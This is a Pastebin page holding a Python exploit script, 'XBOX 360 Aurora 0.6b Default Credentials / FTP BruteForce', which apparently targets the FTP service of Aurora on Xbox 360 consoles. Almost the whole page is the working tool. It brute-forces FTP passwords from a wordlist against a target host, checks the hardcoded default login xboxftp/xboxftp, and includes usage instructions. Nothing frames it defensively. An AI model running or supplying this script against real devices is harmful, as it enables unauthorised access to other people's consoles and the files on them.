API tools faq
paste
Advertisement
FinestSquad

Xbox 360 Aurora 0.6b Default Credentials / FTP BruteForce

FinestSquad
Dec 26th, 2017
448
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.71 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
  2. # Date: 20/12/2017
  3. # Exploit Author: @inqusionSquad
  4. # Vendor Homepage: http://phoenix.xboxunity.net/#/news
  5. # Tested on: XBOX 360
  6. # GREETZ: Iker Legorreta, #RemoteExecution Team
  7.  
  8.  
  9.  
  10. #!/usr/bin/env python
  11. # -*- coding:utf-8 -*-
  12.  
  13. __author__ = '@inqusionSquad'
  14.  
  15. import argparse
  16. import sys
  17. from ftplib import FTP
  18.  
  19. info = '''
  20. XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n
  21. Usage: ./xbox_ftp_brute_forcer.py [options]\n
  22. Options: -t, --target    <hostname/ip>   |   Target\n
  23.          -u, --user      <user>          |   User\n
  24.          -w, --wordlist  <filename>      |   Wordlist\n
  25.          -h, --help      <help>          |   print help\n
  26.  
  27. Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt
  28. '''
  29.  
  30.  
  31. def help():
  32.     print info
  33.     sys.exit(0)
  34.  
  35.  
  36. def check_default_login(target):
  37.     try:
  38.         ftp = FTP(target)
  39.         ftp.login('xboxftp', 'xboxftp')
  40.         ftp.quit()
  41.         print "\n[+] Default login is open."
  42.         print "\n[+] Username : xboxftp"
  43.         print "\n[+] Password : xboxftp\n"
  44.         ftp.quit()
  45.     except:
  46.         pass
  47.  
  48.  
  49. def ftp_login(target, username, password):
  50.     try:
  51.         ftp = FTP(target)
  52.         ftp.login(username, password)
  53.         ftp.quit()
  54.         print "\n[*] Credentials have found."
  55.         print "\n[*] Username : {}".format(username)
  56.         print "\n[*] Password : {}".format(password)
  57.         return True
  58.     except:
  59.         return False
  60.  
  61.  
  62. def brute_force(target, username, wordlist):
  63.     try:
  64.         wordlist = open(wordlist, "r")
  65.         words = wordlist.readlines()
  66.         for word in words:
  67.             word = word.strip()
  68.             if ftp_login(target, username, word):
  69.                 break
  70.     except:
  71.         print "\n[-] There is no such wordlist file. \n"
  72.         sys.exit(0)
  73.  
  74.  
  75.  
  76. parser = argparse.ArgumentParser()
  77. parser.add_argument("-t", "--target")
  78. parser.add_argument("-u", "--username")
  79. parser.add_argument("-w", "--wordlist")
  80.  
  81. args = parser.parse_args()
  82.  
  83. if not args.target or not args.username or not args.wordlist:
  84.     help()
  85.     sys.exit(0)
  86.  
  87. target = args.target
  88. username = args.username
  89. wordlist = args.wordlist
  90.  
  91. brute_force(target, username, wordlist)
  92. check_default_login(target)
  93. print "\n[-] Brute force finished. \n"
  94.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!